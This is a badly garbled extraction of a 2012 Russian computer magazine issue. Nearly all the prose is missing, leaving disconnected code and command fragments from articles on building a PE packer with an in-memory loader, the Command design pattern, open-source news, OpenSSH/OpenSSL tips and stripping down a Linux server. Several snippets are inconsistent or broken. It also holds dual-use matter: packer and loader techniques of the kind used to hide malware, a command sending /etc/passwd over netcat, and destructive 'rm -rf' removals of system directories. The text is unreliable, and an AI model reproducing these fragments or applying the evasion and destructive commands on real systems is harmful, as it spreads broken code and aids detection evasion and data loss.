DWORD dwPackedImageSize = 0xBEEFCACE;


, 0xDEADBEEF , 0xBEEFCACE
.
, , ,
.
aplib (www.ibsensoftware.
com),
, - (LZ).
,

Windows !

095


XP, ntdll.dll
:
NTSTATUS
__in
__in
__in
__out
__in
__in
__out
__in
);
NTSTATUS
__in
__out
__in
__in
__in
__out
);

RtlCompressBuffer(
USHORT CompressionFormatAndEngine,
PUCHAR UncompressedBuffer,
ULONG UncompressedBufferSize,
PUCHAR CompressedBuffer,
ULONG CompressedBufferSize,
ULONG UncompressedChunkSize,
PULONG FinalCompressedSize,
PVOID WorkSpace
RtlDecompressBuffer(
USHORT CompressionFormat,
PUCHAR UncompressedBuffer,
ULONG UncompressedBufferSize,
PUCHAR CompressedBuffer,
ULONG CompressedBufferSize,
PULONG FinalUncompressedSize

, . , ,
, Windows 2000,
NT 4.0 ;), RtlCompressBuffer\
RtlDecompressBuffer .
Platform SDK ,
,
GetProcAddress:

// RtlDecompressBuffer

DWORD (__stdcall *RtlDecompressBuffer)
(ULONG,PVOID,ULONG,PVOID,ULONG,PULONG);
// RtlDecompressBuffer ntdll.dll
(FARPROC&)RtlDecompressBuffer = GetProcAddress(
LoadLibrary("ntdll.dll"), "RtlDecompressBuffer" );

, ,
, . (
) :
DWORD dwImageSize = 0;
DWORD dwImageTempSize = dwPackedImageSize * 15;
//
LPVOID pbImage = VirtualAlloc( NULL, dwImageTempSize,
MEM_COMMIT, PAGE_READWRITE );



APLIB,



096

//
RtlDecompressBuffer(COMPRESSION_FORMAT_LZNT1,
pbImage, dwImageTempSize,
pbPackedImage, dwPackedImageSize,
&dwImageSize);

COMPRESSION_FORMAT_LZNT1 ,
LZ-.
(bit.ly/sV9SVu),
.
(pbImage) PE-.
, ,
PE- Windows.
- :
1. () ,
Image Base (OPTIONAL_
HEADER).
2. PE- , .
3. ,
.
, PE-
, , ,
PE-.
,
.
,
PE-,
, gr8 hellknights (bit.ly/
tc65cB) , ;).
PE- , ,
(
):
HMODULE LoadExecutable (LPBYTE image,
DWORD* AddressOfEntryPoint)


(
, PE-) (
AddressOfEntryPoint). ,
, ,
, , .
, - .
, ,
. , .
, GetModuleHandle(NULL) Image
Base , . FindResource LoadResource , .
. ,

,
.
PEB (Process Enviroment
Block), Image Base. PEB
, 0x30
FS.
PPEB Peb;
__asm {
push eax
mov eax, FS:[0x30];

02 /157/ 2012

HOW-TO: PE-

OllyDbg

mov Peb, eax


pop eax
}
// hModule PE
Peb->ImageBaseAddress = hModule;


LDR_DATA, PEB. :
InLoadOrderModuleList c ;
InMemoryOrderModuleList c ;
InInitializationOrderModuleList c
.
. - :
// ,
//
PLDR_DATA_TABLE_ENTRY pLdrEntry = (PLDR_DATA_TABLE_ENTRY)
(Peb->Ldr->ModuleListLoadOrder.Flink);
pLdrEntry->DllBase = hModule;
...

02 /157/ 2012

. ,
.
LPVOID entry = (LPVOID)((DWORD)hModule + AddressOfEntryPoint);
__asm call entry;

AddressOfEntryPoint
(RVA, Relative Virtual Address) ,
optional header LoadExecutable. RVA (
).


VS 2010
,
-, 10 .
, .
(
/C++) :

(/O1),
.

097


,


.DATA
( /Os).
++,
.
(/GS-).
, .
():
. , -
.rsrc,
. , PE- 512 , .
.
.
(/DYNAMICBASE:NO), (.reloc).
. - , 0x02000000.
GetModuleHandle(NULL) .
.
, CRT-: /ENTRY:WinMain.
, pragma
, , .

:
#pragma comment(linker,"/MERGE:.rdata=.text")

.rdata,
, (,
. .), .text. ,
.data.
#pragma comment(linker,"/MERGE:.data=.text")
// .data ,
//
#pragma comment(linker,"/SECTION:.text,EWR")

,
1,5 .

, . ,
,
. , :
HANDLE hFile = CreateFile(argv[1], GENERIC_READ,
FILE_SHARE_READ, NULL, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, NULL);
DWORD dwImageSize = GetFileSize(hFile, 0);
LPBYTE lpImage = new BYTE[dwImageSize],
lpCompressedImage = new BYTE[dwImageSize];
DWORD dwReaded; ReadFile(hFile, lpImage,
dwImageSize, &dwReaded, 0);
CloseHandle(hFile);

.
, PE-,
. ., ,
. RtlCompressBuffer
RtlGetCompressionWorkSpaceSize.
, ,
, .
, (
), :
DWORD format =
COMPRESSION_FORMAT_LZNT1|COMPRESSION_ENGINE_STANDARD;
DWORD dwCompressedSize, dwBufferWsSize, dwFragmentWsSize;
RtlGetCompressionWorkSpaceSize(
format, &dwBufferWsSize, &dwFragmentWsSize);
LPBYTE workspace = new BYTE [dwBufferWsSize];
RtlCompressBuffer(format, //
lpImage,
//
dwImageSize,
//
lpCompressedImage,
//
dwImageSize,
//
4096,
// ,
&dwCompressedSize,
//
//
workspace);
//

,
. ,
.
bin2h (www.deadnode.org/sw/bin2h/). ,
- :


,
:

.
, ,
xor
. ,
,

098

. -
. ,
xor .
,
,
.
- ,
, .


-
. .

,
-

, .

02 /157/ 2012

HOW-TO: PE-

unsigned int loader_size = 1536;


unsigned char loader[] = {
0x4d,0x5a,0x00,0x00,0x01,0x00,0x00, ...

. , , ,
.
90- .
, PE-
. ,

. , ,
, ,
, () .
,
;).
:
(.text) .
,
(SizeOfRawData). (FileAlignment).
(Misc.VirtualSize), .
(OptionalHeader.
SizeOfImage) [ ] + [ ],
FileAlignment.
.
. ,
(Misc.VirtualSize)
(.text) ,
. ,
511 .
, , .
:

//

PBYTE pbLoaderCopy =
new BYTE[loader_size + dwCompressedSize + 0x1000];
memcpy(pbLoaderCopy, (LPBYTE)&loader, loader_size);
//
PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)pbLoaderCopy;
PIMAGE_NT_HEADERS nt =
MakePtr(PIMAGE_NT_HEADERS, pbLoaderCopy, dos->e_lfanew);
//
PIMAGE_SECTION_HEADER text = IMAGE_FIRST_SECTION(nt);
//
memcpy(&pbLoaderCopy[
text->PointerToRawData + text->Misc.VirtualSize],
lpCompressedImage, dwCompressedSize);
// , Misc.VirtualSize
text->SizeOfRawData =
ALIGN(text->Misc.VirtualSize + dwCompressedSize,
nt->OptionalHeader.FileAlignment);
// ( )
text->Misc.VirtualSize += dwCompressedSize;
//

02 /157/ 2012

notepad.exe , UPX!

nt->OptionalHeader.SizeOfImage =
ALIGN(test->Misc.VirtualSize + test->VirtualAddress,
nt->OptionalHeader.FileAlignment);
//
DWORD dwNewFileSize = pSections->SizeOfRawData +
test->PointerToRawData;

, 0xDEADBEEF
0xBEEFCACE, , ! 0xBEEFCACE ,
0xDEADBEEF . [ ] + [
] + [ ].
, Misc.VirtualSize,
.
:
for (int i = 0; i < simple_packer_size; i++)
if (*(DWORD*)(&pbLoaderCopy[i]) == 0xBEEFCACE)
*(DWORD*)(&pbLoaderCopy[i]) = dwCompressedSize;
else if (*(DWORD*)(&pbLoaderCopy[i]) == 0xDEADBEEF)
*(DWORD*)(&pbLoaderCopy[i]) =
nt->OptionalHeader.ImageBase +
text->VirtualAddress +
text->Misc.VirtualSize;

, , .
, CreateFile/WriteFile.

UPX
notepad.exe 1 : 46 592
48 128 UPX. . .
,
, .
! .
,
. z

099

deeonis (deeonis@gmail.com)





. -
, , -
.
,
,

.
,

.

100

02 /157/ 2012

, ,
. ,
.
,
. <ctrl-0> <ctrl-9>,
ctrl-z .
, : switch,

- , . , -,
.
hotkeys,
, -
. -, , . ,
switch .
,
, , , -
.

, HotKeys
class Calculator
{
public:
void runCalc();
void closeCalc();
}
class Printer
{
public:
void printDocument();
void printImage();
void printEmail();
}
class Browser
{
public:
void runBrowser();
void closeBrowser();
}

,
, .
execute(),
- .

class Command
{
public:
void execute() = 0;
}

, Command,
execute(). ,
, .
RunCalcCommand,
Command, execute() runCalc()
Calculator.

class RunCalcCommand: public Command
{
Calculator *calc;
public:
RunCalcCommand(Calculator *excalc)
{
calc = excalc;
}
void execute()
{
calc->runCalc();
}
}

,
, RunCalcCommand
Calculator. .
ModernCalculator, .
, ,

//


, , .
, .
API. ,
, ,
.
,
, API- ,
, , , ,
. hotkeys ,
.
,
, .
, ,
.

02 /157/ 2012

Java

101


,
.
.
Command.
.

.
, Ctrl -
, . , , ctrl-a ctrl-k,
.

,
execute() ,
.
hotkey
//
const int comCount = 10;
Command* commands[comCount];
Calculator *calc = new Calculator();
commands[0] = new RunCalcCommand(calc);
//
//
hotkey = catchHotKey();
//
int index = hotkey2index(hotkey);
commands[index]->execute();

- .
Command,
, .
. , , , , , hotkeys,
- .


, .
ctrl-z .
,
, .
Command.
Command,
class Command
{
public:

{
calc->runCalc();
}
void undo()
{
calc->closeCalc();
}
}

undo(),
-. ,
.
, undo() RunCalcCommand closeCalc() Calculator.
.

//
const int comCount = 10;
Command* commands[comCount];
Command *lastCommand = new NoCommand();
Calculator *calc = new Calculator();
commands[0] = new RunCalcCommand(calc);
//
//
HotKey *hotkey = catchHotKey();
// ,
if (hotkey->str() == "ctrl-z")
{
lastCommand->undo();
}
//

lastCommand

ctrl-z . ,
NoCommand. :
NoCommand
class NoCommand: public Command
{
public:

void execute() = 0;
void undo() = 0;
}
class RunCalcCommand: public Command
{
Calculator *calc;
public:
RunCalcCommand(Calculator *excalc)
{
calc = excalc;
}
void execute()

102

Wikipedia .

02 /157/ 2012

void execute() {};


void undo() {};

Client

Invoker

- .
, .
lastCommand NULL,
undo()
, ,
, .
- , .
,
, ,
.

. -
. , , ctrl-z.

, .

. , .

class MacroCommand: public Command


{
Command *commands;
int comCount;
public:
MacroCommand(Command *comArray, int elemCount)
{
commands = comArray;
comCount = elemCount;
}
void execute()
{
for (int i = 0; i < comCount; i++)
{
commands[i]->execute();
}

Receiver
Action()

Command
Execute()

ConcreteCommand
Execute()
state

receiver->Action();

undo().
,
, , execute()
undo().




. . , ,
.
, Command.
,
. execute(). ,
, execute().
.
.
Command
class Command
{
public:
void execute() = 0;
void undo() = 0;
void load() = 0;
void store() = 0;
}

}
void undo()
{
for (int i = 0; i < comCount; i++)
{
commands[i]->undo();
}
}

load() ,
store() .
,
. ,
.


.

, MacroCommand
Command execute undo. .
, . execute()
.

02 /157/ 2012


-
. ,

. ,
. z

103

UNIXOID

Adept (adeptg@gmail.com)


open source 2011
WWW

OPEN
SOURCE

104

kernelnewbies.
org/LinuxChanges

changelog
Linux.


Linux 3.1. ,

open source 2011


.
, Microsoft Oracle

-
, ,

: appdb.
winehq.org, wiki.php.net, mysql.com,
sourceforge.net, kernel.org linux.com.

02 /157/ 2012

open source 2011

LINUX

Linux. , ,
,
. 2011
. , 2.6.40,

3.0. (
Big Kernel Lock),
,
, ,
2.6
- .
( ),
(

).
2.6.37
2.6.39 3.03.1.
( )
.
,
, :
Intel GMA500 (-
Intel Atom Z-).

- : , Intel
, Intel GMA500, , PowerVR SGX 535 Imagination
Technologies.
, .
512
libata (, 4 ,
).
USB
USB2VGA- (
USB).
: UniCore-32 (
), 64-bit Tilera
(
100 , , ,

GNOME 3.2 Fedora 16

02 /157/ 2012

Debian 6

) OpenRISC (

ARM10).
NFC (Near Field
Communication),

( 10 ).

(,
Google Wallet).
,
SSD ( , dm-crypt
ext4).
,
Microsoft Kinect Nintendo Wii Remote.
DRM-
(Direct Rendering Manager,
Digital rights management) Intel, Radeon
Nouveau. Intel
( Sandy Bridge) .
Ivy Bridge
Radeon Nouveau.
: ,
NVIDIA
.


:
KVM
(
).
Xen Dom0 (-) .
,
( , Debian) Xen.
,

(pass through) PCI
.
cgroups ( -

, , LXC )

( IOPS').
(
).
,
, :
Btrfs
LZO.

zlib,
,
.
Btrfs
( -o
autodefrag).
SquashFS,
LiveCD, XZ
.

:
Accel-pptp PPTP/PPPoE/
L2TP- PPTP-,
. ,
, user-space. ,
.
B.A.T.M.A.N.
(Better Approach To Mobile Adhoc
Networking), mesh (,
).
iSCSI
target.
DFS-
(Distributed File System) Windows 2008.
.

105

UNIXOID
( ,
, ).

DESKTOP ENVIRONMENT

TOP10 Distrowatch

ipset
netfilter,
IP/MAC- TCP/
UDP-.
Wake on WLAN
.

:


( ), session ID. ,
make
.
, 1 /proc/sys/
kernel/sched_autogroup_enabled.
,
.
, . -rt (Realtime) ,
Linux ,
Linux 3.0 (
2.6.33).

,
. Linux 3.1
pf-kernel,
BFS,
- BFQ
TuxOnIce, Linux 2.6.37 (
phoronix.com).
Release early, release often
Linux
. ,
,
Linux,
Linux Foundation 2011 Long Term Support Initiative (LTSI).
-

106

,
. ,
Gnome 3.0.
, Gnome
2.
(, ,
Gnome3 , XFCE, Gnome2).
, :
Control Center
.
Empathy
, Evince
, Eye of GNOME
.
Gnome 3.2

:
web:
Google Calendar,
Google Docs.

.
.
SIP Empathy.
Apple Filing Protocol
Apple.
Gnome3

c , JavaScript
CSS. extensions.gnome.org

(, Firefox
) .
Gnome3 Gnome2
, ,
Gnome
Mate Desktop Environment (MDE).
KDE ( , , 15 )
.
, .
4.6 4.7. ,
:
OpenGL ES 2.0 Kwin,
KDE
. Kwin
.
Plasma Active ,
.
(Activities),

Activity ( )
Activity.
( SQL
GDB)
Kate.
Gwenview Ksnapshot

.

LibreOffice 3.4.1 Ubuntu Oneiric Ocelot

02 /157/ 2012

open source 2011

HAL.
Zeitgeist ( ).
Nepomuk.
VPN NetworkManager 0.9
3G.
Kontact Suite
Akonadi.
KDM
Grub, Grub KDM.
Python Kdevelop.
digiKam ( ,
).
, KDE4,

KDE3, , Trinity,
,
Qt4.
KDE
:
ownCloud 2
Dropbox, LAMP
.
Necessitas ( Qt Android)
,
alpha.

Linux
: , .
, 2011
, Debian, 6 ( Squeeze). :
Grub2 .
( ) init- .
OSS.
IPv6.
Dpkg XZ,
Perl
.
29 .
, 63 %
Linux-
Debian.
Linux 2.6.32
( ), GCC 4.4.5, Xen 4.0.1, X.Org 7.5, KDE SC 4.4.5,
GNOME 2.30, Xfce 4.6, OpenOffice.org 3.2.1.
ConsoleKit ( ) PolicyKit ( ).
DNSSEC.
ISO- ,
dd.
Debian GNU/kFreeBSD
FreeBSD. 32- 64-
.

02 /157/ 2012

Linux Mint 12

backports.org,

,
backports.debian.org.
Debian ,
( 18
6).
( 13 )
, debian.org.
rolling release
Debian (
Gentoo Arch Linux). Debian CUT (Constantly Usable
Testing)
,
.
Debian,
Ubuntu,
: 11.04 (Natty Narwhal)
11.10 (Oneiric Ocelot). :
Unity ( Gnome3)
DE , .
Software Center
,

(, ,
qtnx).
.
,
. ,
.
Ubuntu One
2 5 ( $2,99
$29,99 20 ). ,

.
Android, , ,

U1 .
, :
LibreOffice OpenOffice,
Banshee
Rhythmbox, Evolution Thunderbird,
LightDM
GDM, Synaptic PiTIVi,
Deja Dup
. LiveCD (, , ),
DVD- ,
LibreOffice, Inkscape, GIMP
Pitivi. Ubuntu Lubuntu LXDE.
,
Canonical
:
Ubuntu ARM Server Edition
ARM (
,
).
OpenStack Eucalyptus.
Orchestra ( ,
)
Juju (
).
Ubuntu
, Unity,

, distrowatch.com Ubuntu
.
Linux Mint ( Ubuntu), 11
( Katya, Ubuntu 11.04)
12 (Lisa Ubuntu 11.10). Mint , Gnome
Shell Gnome2.
Mate Desktop
Environment Gnome2.
-

107

UNIXOID
, Canonical
Ubuntu Developer Summit,
,
.
12.04 LTS (Long Term Support)
:
desktop-
, ,

(-,
).
64- .
LiveCD 750 .
Rhythmbox Banshee Tomboy Gnote, Mono
LiveCD.
Unity
.
KVM
ARM,
SPICE, .
- (,
Lightning Thunderbird).
2011 RPM-, Fedora: 15
(Lovelock) 16 (Verne).
:
GRUB2.
Gnome2 Gnome3.

firewalld,

.
SPICE Virt Manager.
:
p<slot_number>p<port_
number> PCI em<port_number>

.
setuid
.
systemd.
UID GID 1000 UID/GID .
, Novell, openSUSE
2011
: 11.4 12.1.
init-
systemd, Snapper
btrfs
ownCloud.
BSD- . FreeBSD Xen,
ZFS (
),
/ AES
AES-NI .
Changelog FreeBSD 9 :

Clang, GCC.
RAID-
ataraid graid,
GEOM.

BSDInstall.
RCTL,
(CPU, memory ) , Jail.
Capsicum
(
)
.

USB-
USB 3.0.
FreeBSD
BHyVe.
OpenBSD : 4.9 5.0 ( , ).
AESNI, 4 64
, Wake on LAN,
.
Linux
( ), ,
, . Linux Android (

200 ),

, , 2011 : 3 ( )
4 (,
).

, . :

, .
,
.
Face Unlock
.
,
.
.

( User Agent,
Google Chrome).

StatCounter Global Stats


5 2011
50%

EI
Firefox
Chrome
Safari
Opera

40%
30%
20%
10%
0%

Statounter

108

02 /157/ 2012

open source 2011

OpenBSD 5.0

Nokia N9,

MeeGo, ,
MeeGo
Tizen, HTML5 .
(

2012-), , Linux
Foundation LiMo Foundation.

-
.

.
changelog
FireFox 4:
Google Chrome:

.

(
, ).
Web Console (Web
Inspector) Firebug.
WebM VP8
<video>.
, ,
Mozilla ( Firefox Sync).
WebGL (,

OpenGL JavaScript).

API IndexedDB,
JavaScript
web-
.
Web
Sockets
web-.
about:memory, ,
.
JavaScript-

02 /157/ 2012

.
HTTP- Do Not
Track, . :)

, Flash-
.
,
,
,
59:
.
about:permissions
,
HTML5 .
HTML5-
progress contextmenu.
, (,
Skype Java), .
Google Chrome, Firefox
,
(
9 15).

, :
WebGL .
JavaScript.
, .
.

( Google).
Flash Cookie.
PDF.
API IndexedDB.
Native Client,
C/++
.
StatCounter,
Google Chrome ( IE),
Firefox.

TO BE CONTINUED
,
, .
, (
GCC) ARM,
,
. Btrfs
(,
FS ). Flash, ,
( , , ).

Linux Doom 3
. , ,
GIMP 2.8. ,
, : :). z

Ubuntu Software Center

109

UNIXOID

(execbit.ru)

INFO

OpenSSL

: liststandart-commands,
list-message-digestcommands, listcipher-commands.

OPENSSL
OPENSSH,

, OpenSSH OpenSSL,
.

.
,
.

.
OPENSSH
OpenSSH, Telnet, .
, , . ,
, ,

110

OpenSSL Gmail

02 /157/ 2012

OpenSSL


.
, .
OpenSSH
.
, . ,
.
ssh (~/.ssh/config) :
ControlMaster auto
ControlPath ~/.ssh/mux_%h_%p_%r

, ,
.
. ,
SSH- ,
,
SSH-.
:
ForwardAgent yes
Host host
HostName host.com
ProxyCommand ssh proxy-host.com \
netcat -q 600 %h %p

ssh host host.com


proxy-host.com.
HTTP-.
,
HTTP-.
orkscrew (www.agroman.net/corkscrew/), SSH- HTTP. ( proxy.com 80
HTTP- ):

02 /157/ 2012

Host *
ProxyCommand corkscrew proxy.com 80 %h %p

HTTP-.
.
, , pv
SSH:
$ sudo apt-get install pv
$ yes | pv | ssh host.com "cat > /dev/null"

.
UNIX- tcpdump,
. OpenSSH :
$ ssh root@host.com tcpdump -w 'port !22' \
| wireshark -k -i -

, host.com,
wireshark .
.

, ,
. cstream:
$ sudo apt-get install cstream
$ tar -cj /backup | cstream -t 512k | \
ssh host 'tar -xj -C /backup'

SSH-. , ,
SSH- ,
, .
autossh,
,

111

UNIXOID

SSL- Gmail

, :
$ sudo apt-get install autossh
$ autossh -M50000 -t server.example.com \
'screen -raAd mysession'


. :
$ echo "uptime" | pee "ssh host1" "ssh host2" \
"ssh host3"

.
-
, - .
:
$ ssh user@host cat //// | \
diff //// -

,
:

$ sudo apt-get install multitail


$ multitail -l 'ssh host1 "tail -f \
/var/log/apache2/error.log"' -l 'ssh host2 \
"tail -f /var/log/apache2/error.log"'

11
.
,
, :
$ ssh root@host1 "cd / && tar -cf ." |\
ssh root@host2 "cd / && tar -xf -"

12
.
, , . .
xclip:
$ ssh user@host cat /.txt | xclip

$ diff <(ssh host1 cat /etc/apt/sources.list) \


<(ssh host2 cat /etc/apt/sources.list)

13 SSH.
, NTP-
NTP-, :

10
. multitail SSH
:

# date --set="$(ssh user@server date)"

14
.
, .
, SSH
:

CPU0: RNG AES


,
CPU VIA Eden (

AES):
% openssl speed -elapsed -evp aes-256-cbc
type
16 bytes 64 bytes 256 bytes 1024 bytes 8192 bytes
aes-256-cbc 21780.33k 79591.78k 198578.08k 317102.05k 383371.05k

112

# ssh remotehost 'dpkg --get-selections' | \


dpkg --set-selections && dselect install

15 .
X- , ImageMagick:
# ssh user@host "DISPLAY=:0.0 import -window \
root -format png -" | display -format png -

, > file.png.

02 /157/ 2012

16 . ,
,
(, ), SSH ,
. :
Host host.com
Ciphers arcfour256
MACs umac-64@openssh.com

17 .
. dd:
$ dd if=/dev/dsp | ssh -c arcfour -C \
user@host dd of=/dev/dsp

18 . ,
,
:
$ ssh -T user@host < script.sh

SSL-. s_time. SSL, openssl:


$ openssl s_time -connect gmail.com:443 \
-www /test.html -new
103 connections in 0.75s; 137.33 connections/user sec,
bytes read 42436
103 connections in 31 real seconds, 412 bytes read per
connection


:
$ openssl s_time -ssl3 -cipher HIGH \
-connect gmail.com:443 -www / -new
99 connections in 0.73s; 135.62 connections/user sec,
bytes read 40788
99 connections in 31 real seconds, 412 bytes read per
connection

SSL-.
. :

OPENSSL
OpenSSL
,
SSL Netscape.
, OpenSSL
SSL- , ,
. . :
RSA DSA ( rsa, dsa,
dsaparam);
x509,
, ( x509, req, verify, ca,
crl, pks12, pks7);
(
enc, rsautl);
( dgst);
S/MIME ( s/mime).
OpenSSL SSL s_client/s_
server
( speed).
OpenSSL,

, .


OpenSSL ,

IFS=":"
for c in $(openssl ciphers -ssl3 RSA); do
echo $c
openssl s_time -connect host:443 -www / -new \
-time 10 -cipher $c 2>&1 | grep bytes
echo
done

SSL ,
, , SSL-.
SSL- , OpenSSL. OpenSSL:
$ openssl s_server -cert mycert.pem -www

:
$ openssl s_time -connect myhost:4433 \
-www / -new -ssl3


OpenSSL s_client, SSL-
. ,
. SSL-, ,
, -

x509

02 /157/ 2012

113

UNIXOID

(execbit.ru)

SSH pv

openssl, .
:

, ,
:

$ echo | openssl s_client -connect \


www.google.com:443 2>/dev/null | \
openssl x509 -dates -noout
notBefore=Oct 26 00:00:00 2011 GMT
notAfter=Sep 30 23:59:59 2013 GMT

$ cat /etc/passwd | openssl


aes-256-cbc -a -e -pass pass:
netcat -l -p 8080
$ netcat :8080 | openssl
aes-256-cbc -a -d -pass pass:

s_client ,
:

, ( /tmp/passwd):

$ openssl s_client -connect www.google.com:443 \


-cipher LOW
CONNECTED(00000003)
140513251690152:error:14077410:SSL routines:SSL23_
GET_SERVER_HELLO:sslv3 alert handshake failure:s23_
clnt.c:658:

\
| \
\
> passwd

$ for f in * ; do [ -f $f ] && \
openssl enc -aes-256-cbc -salt -in $f \
-out $f.enc -pass file:/tmp/passwd ; done

:
$ openssl enc -d -aes-256-cbc -salt \
-in .enc -out filename \
-pass file:/path/to/passwd

, , ,
Google. s_client
(
SSL Telnet). :

, , :

$ openssl s_client -starttls smtp -crlf \


-connect smtp.gmail.com:25

$ tar c | openssl enc -aes-256-cbc -e \


> secret.tar.enc

OpenSSL ,
,
,
. openssl , ,
UNIX,
. -

OpenSSL :
$ openssl rand 8 -base64
O0Hqtv9l0sY=

/etc/passwd :
# openssl passwd -1 my-secret-pass
$1$WA7AVhQL$y9VaGwseiKRLSGoJg21TP0

, base64
, :
$ tar -c | gzip -9 | openssl enc \
-base64 > text-message.txt

MAC-:
$ openssl rand -hex 6 | \
sed 's/\(..\)/\1:/g; s/.$//'
f2:9e:56:fd:5a:93

speed

114

,
, OpenSSL OpenSSH,
.
,
. z

02 /157/ 2012

SYN/ACK

(execbit.ru)
00000000\r_NET (0000nline.ru)

LINUX-




.
Linux-

, ,
,
.
, ,
,
Linux

.

116
0116

INFO


rkhunter,

,


.

,

uname dmesg,

/boot/
grub/menu.lst,

.

02
02 /157/
/157/ 2012
2012

Drupal

.
,
,
,
. ,
, web- ftp, DNS, . .
,
, ,
. ,
, ,

.

, ,
, ,
. , , .
,

. ,
-
.
, ,
.

,
,
, .




,
,


,
FTP-, sendmail, .
, .

2.

, . ,
. ,
: web-.
web-, ,
Django. PHP+Djoomla/
Drupal? , !
,
:
1. web- ( Apache, nginx ).
2. Python, Django.
3. Django, .
4. PostgreSQL, .
5. SSH .

, . : Linux-
.
ArchLinux, (, , -
Slackware Gentoo, ).
ArchLinux , ,
Yandex ( x86_64-: http://goo.gl/EZRtQ). ISO-
.
:
/arch/setup, Select Source, <Enter>, Prepare hard drive(s), <Enter>,
ext2. Select Packages,
<Enter> . Configure system,
<Enter>, Done. Install
bootloader, ,
/boot/grub.conf, <Enter> , , Exit install.
( ISO-).

root ( )
. .
. DHCP-,
DHCP-:

ArchLinux

1.

02
02 /157/
/157/ 2012
2012

117
0117

SYN\ACK
SYN/ACK

00000000\r_NET (0000nline.ru)

# dhcpcd eth0

, Pacman , /etc/pacman.d/mirrorlist :
Server = ftp://mirror.yandex.ru/archlinux/$repo/os/$arch
Server = http://mirror.yandex.ru/archlinux/$repo/
os/$arch

:
# pacman -Syu

, Pacman.
.
. nginx, Python, Django
PostgreSQL:
# pacman -S nginx python2 django

, (
). : libffi,
postgresql-libs, libxml2 sqlite3, ,
. ( ). , .
.
, :

, ,

# pacman -R cryptsetup device-mapper lvm2 mdadm \


xfsprogs jfsutils reiserfsprogs


:
# pacman -R iputils keyutils krb5 heirloom-mailx ppp \
wget dbus-core wpa_supplicant libpcap libnl libldap

USB-, PCI PCMCIA- :


# pacman -R usbutils pcmciautils sysfsutils

# pacman -Qs

:
,
. -, .
GCC, binutils, ,
:
# pacman -R binutils

,
man-:
# pacman -R licenses groff man-db man-pages texinfo


RAID-. ,
, :

# pacman -R libpipeline libsasl libgcrypt libgpg-error

, .

3. , -
,
,
.
.
. , ArchLinux
-dev , /usr/include
.
:
# rm -rf /usr/include






,
ACL ..
118
0118

/usr/lib ,
, .
:
# rm /usr/lib/*.a

/bin, /sbin, /usr/bin, /usr/sbin


, , .
,
, . .
.

02
02 /157/
/157/ 2012
2012

Drupal


:
# rm /sbin/{badblocks,debugfs,dumpe2fs,e2image,e2label,
e2undo,resize2fs,tune2fs}

.
, :
# rm /sbin/{fdisk,cfdisk,sfdisk}


swap-:
# rm /sbin/mkfs.*
# rm /sbin/mkswap

dd install:

# rm /usr/sbin/chcon

,
cracklib,
( , ) PAM,
. , ,
:
# rm /usr/sbin/cracklib*
# rm -rf /usr/share/{cracklib,dict}

. -,
,
, .
#
#
#
#

rm
rm
rm
rm

/usr/bin/pacman*
/usr/bin/makepkg
/etc/pacman*
-rf /var/cache/pacman

# rm /bin/{dd,install}

. , ACL, capabilities
/ .
,
. , ,
(-, , ,
).
, ( acl):
# rm /usr/bin/{chacl,getfacl,setfacl}


( attr):
# rm /usr/bin/{chattr,lsattr,getfattr,setfattr}

, capablities ( libcap):

. , , initrd:
# rm -rf /lib/initcpio

:
# rm -rf /media /opt /usr/local

(
/usr/src):
# rm -rf /usr/src

, ,
/lib /usr/lib
( , ).
:
# find /bin /sbin /usr/bin /usr/sbin |\
xargs ldd | grep '\.so' |\
cut -d ' ' -f 1 | sed 's/^[ \t]*//' |\
sort | uniq

# rm /usr/sbin/{getcap,setcap}

/dev/null
:

ldd

02
02 /157/
/157/ 2012
2012

diff ls -1 /lib /usr/lib.


.

119
0119

SYN\ACK
SYN/ACK
4.
, ,
. ,
nginx, , Django . ,
, . ,
- Django-
- ,
/www ( : http
django ). ,
.
,
nginx . ArchLinux
, /etc/
rc.conf:
#
HOSTNAME="example.com"
#
interface=eth0
address=1.2.3.4
netmask=255.255.255.0
broadcast=1.2.3.4
gateway=1.2.3.4
#
DAEMONS=(hwclock syslog-ng network crond postresql nginx)

/ /etc/rc.d, :
# /etc/rc.d/nginx restart

. , , ,
. -,
:
# passwd

-, :

00000000\r_NET (0000nline.ru)

, 22 80 (SSH HTTP):
#
iptables -P INPUT DROP
iptables -A INPUT -i lo -j ACCEPT
# DoS
iptables -A INPUT -p tcp -m tcp --tcp-flags \
SYN,ACK,FIN,RST RST -m limit --limit 1/s -j ACCEPT
#
iptables -A INPUT -p all -m state --state \
RELATED,ESTABLISHED -j ACCEPT
#
iptables -A INPUT -i eth0 -p tcp --dport 22 -j ACCEPT
iptables -A INPUT -i eth0 -p tcp --dport 80 -j ACCEPT
# ICMP-
iptables -A INPUT -i eth0 -p icmp -m icmp \
--icmp-type 3 -j ACCEPT
iptables -A INPUT -i eth0 -p icmp -m icmp \
--icmp-type 11 -j ACCEPT
iptables -A INPUT -i eth0 -p icmp -m icmp \
--icmp-type 12 -j ACCEPT

, : .
# echo 'echo $((0xffffffff ^ (1 << 16))) > \
/proc/sys/kernel/cap-bound' >> /etc/rc.local
# echo 'echo $((0xffffffff ^ (1 << 18))) > \
/proc/sys/kernel/cap-bound' >> /etc/rc.local
# echo 'echo $((0xffffffff ^ (1 << 19))) > \
/proc/sys/kernel/cap-bound' >> /etc/rc.local
# echo 'echo $((0xffffffff ^ (1 << 21))) > \
/proc/sys/kernel/cap-bound' >> /etc/rc.local


( ),
chroot, ptrace,
,
, swap. ,
, root.

# useradd vasya

-, root- SSH:
# echo 'PermitRootLogin no' > /etc/ssh/sshd_config
# /etc/rc.d/sshd restart

5.

, Linux-,
,

sysctl.conf,
:
#
net.ipv4.ip_forward = 0
#
net.ipv4.conf.default.rp_filter = 1
net.ipv4.conf.default.accept_source_route = 0
# SYNACK
net.ipv4.tcp_synack_retries = 2
#
net.ipv4.conf.all.accept_redirects = 0
net.ipv4.conf.all.secure_redirects = 0
# PING-
net.ipv4.icmp_echo_ignore_broadcasts = 1
# SYN-
net.ipv4.tcp_syncookies = 1
120
0120

02
02 /157/
/157/ 2012
2012

Drupal

? .
ArchLinux, ,
.
.
1. .
2. ISO- ArchLinux,
( VirtualBox ).
3. /mnt.
: /dev/sda3 - , /dev/
sda1 - /boot, /dev/sda4 - /home. :
# mount /dev/sda3 /mnt
# mount /dev/sda1 /mnt/boot
# mount /dev/sda4 /mnt/home



-

WWW,

13. /etc/fstab :

4. /media:
# mount /dev/sdb1 /media

5. :
# cd /mnt
# tar -czf /media/root.tar.gz .
# sync

6. , ISO-
ArchLinux ,
.
7.
cfdisk, :
sda1 swap (: * 2);
sda2 (: 1 );
